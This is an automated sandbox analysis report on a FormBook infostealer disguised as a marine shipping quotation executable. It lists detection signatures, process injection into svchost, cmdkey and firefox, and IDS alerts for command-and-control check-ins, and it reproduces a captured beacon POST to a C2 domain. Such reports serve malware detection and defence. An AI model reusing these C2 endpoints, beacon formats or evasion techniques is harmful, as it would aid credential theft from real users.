Windows Analysis Report
QUOTATION#070125-ELITE MARINE .exe

Overview

General Information

Sample name: QUOTATION#070125-ELITE MARINE .exe
Analysis ID: 1586802
MD5: 71a9653e383348db78edaa7619dea426
SHA1: 4670f01da3fe979ffe6c27ef16080cdb71c03770
SHA256: 8cf3f5031f2201c448b2dc53d88b0a2142797116a6781d0f1222733127711add

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • QUOTATION#070125-ELITE MARINE .exe (PID: 2636 cmdline: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe" MD5: 71A9653E383348DB78EDAA7619DEA426)
    • svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • RAVCpl64.exe (PID: 7540 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cmdkey.exe (PID: 7612 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • firefox.exe (PID: 7964 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", CommandLine|base64offset|contains: 0H4, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", ParentImage: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, ParentProcessId: 2636, ParentProcessName: QUOTATION#070125-ELITE MARINE .exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", ProcessId: 7524, ProcessName: svchost.exe
Source: Process started, Author: vburov: Data: Command: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", CommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", CommandLine|base64offset|contains: 0H4, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", ParentImage: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, ParentProcessId: 2636, ParentProcessName: QUOTATION#070125-ELITE MARINE .exe, ProcessCommandLine: "C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe", ProcessId: 7524, ProcessName: svchost.exe

AV Detection

Source: QUOTATION#070125-ELITE MARINE .exe, Avira: detected
Source: QUOTATION#070125-ELITE MARINE .exe, ReversingLabs: Detection: 60%
Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: QUOTATION#070125-ELITE MARINE .exe, Joe Sandbox ML: detected
Source: QUOTATION#070125-ELITE MARINE .exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: Binary string: cmdkey.pdbGCTL source: svchost.exe, 00000001.00000003.11702724830.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11734330614.0000000003200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11152091635.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11648789785.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11646044895.0000000003500000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.000000000384D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11733827034.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11737430340.0000000003572000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.0000000003720000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11152091635.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, QUOTATION#070125-ELITE MARINE .exe, 00000000.00000003.11151732292.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11648789785.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.11646044895.0000000003500000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000003.00000002.15246648295.000000000384D000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11733827034.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11737430340.0000000003572000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15246648295.0000000003720000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: cmdkey.pdb source: svchost.exe, 00000001.00000003.11702724830.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.11734330614.0000000003200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: svchost.pdb source: RAVCpl64.exe, 00000002.00000002.16214552888.00000000066DC000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000003D4C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.000000000291C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: svchost.pdbUGP source: RAVCpl64.exe, 00000002.00000002.16214552888.00000000066DC000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15244350653.000000000316D000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000003D4C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.000000000291C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_0066C2A2 FindFirstFileExW,0_2_0066C2A2
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_006A68EE FindFirstFileW,FindClose,0_2_006A68EE
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_006A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_006A698F
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_0069D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0069D076
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_0069D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0069D3A9
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_006A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006A9642
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_006A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006A979D
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_006A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_006A9B2B
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_0069DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0069DBBE
Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_006A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_006A5C97
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then mov ebx, 00000004h, 1_2_03C804E8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, Code function: 4x nop then mov ebx, 00000004h, 2_2_034704E8
Source: C:\Windows\SysWOW64\cmdkey.exe, Code function: 4x nop then mov ebx, 00000004h, 3_2_034704E8

              Networking

              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49806 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49814 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 76.223.54.146:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49798 -> 198.58.118.167:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49818 -> 160.25.166.123:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 104.21.13.141:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 104.21.13.141:80
              Source: DNS query: www.furrcali.xyz
              Source: Joe Sandbox View, IP Address: 103.106.67.112
              Source: Joe Sandbox View, IP Address: 104.21.112.1
              Source: Joe Sandbox View, IP Address: 194.9.94.85
              Source: Joe Sandbox View, ASN Name: GIGAINFRASoftbankBBCorpJP
              Source: Joe Sandbox View, ASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ
              Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown, UDP traffic detected without corresponding DNS query: 9.9.9.9
              Source: C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe, Code function: 0_2_006ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_006ACE44
              Source: unknownHTTP traffic detected: POST /jwa9/ HTTP/1.1Host: www.chiro.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeCache-Control: no-cacheContent-Length: 199Content-Type: application/x-www-form-urlencodedOrigin: http://www.chiro.liveReferer: http://www.chiro.live/jwa9/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 6c 56 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d Data Ascii: lV=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:47:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oi9rZc1DajXu1cLSVCN7jLyQ0aRms2gZLp75UQAdmOBAl%2FnlViuBI%2FP6bavjHK%2FBc19EvmEP%2B8Jebj5TPgTCOybMbJhDkVvHqHCqAKCSNYm1segd3upbK2Cayc8M9%2Bio26BT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5919f6c076075-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118823&min_rtt=118823&rtt_var=59411&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nXhyTWjNyFWLhCq5LJQ0mJ1gXWo415ILhjEOrR%2BMXrpKAw1%2FL7GYDUIKWJKg%2B7YEDrue1SLJyti%2Bd0cIvAcyyTyTD5EgOn3DpsiSUPX03ar1byJ4HZ27nn9LC587PAUEFgi7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff591affb8fa482-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=120227&min_rtt=120227&rtt_var=60113&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zELVCdTgKqAqAvxAEYSCyv85anV331n63HVrbhVhkxEHdyqn6GB7W2T4qdp%2B%2B2C1mSmGBfD7SjEhQ3dVNHOMr7Op3CJVMDgnT3Mmj1ta1A%2BeVxfSwNsq5LcGeWywdxWMNd7X"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff591c08a05a482-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=120105&min_rtt=120105&rtt_var=60052&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7964&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2FjrVcVQEWt6V7%2B9%2BJAhwqZHBpNWakYQZCxhzY3EL4%2B29uL2NKdnjArQ6U6LXWuFA0GSCdb%2FNC0jdG%2FkRdwev5CB%2FKJ3YPWg6Fad2EdiZeOdEsHUqp4Uf6rYFsawNnL5vDyo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff591d12c780298-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119802&min_rtt=119802&rtt_var=59901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=530&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:48:11 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 
73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
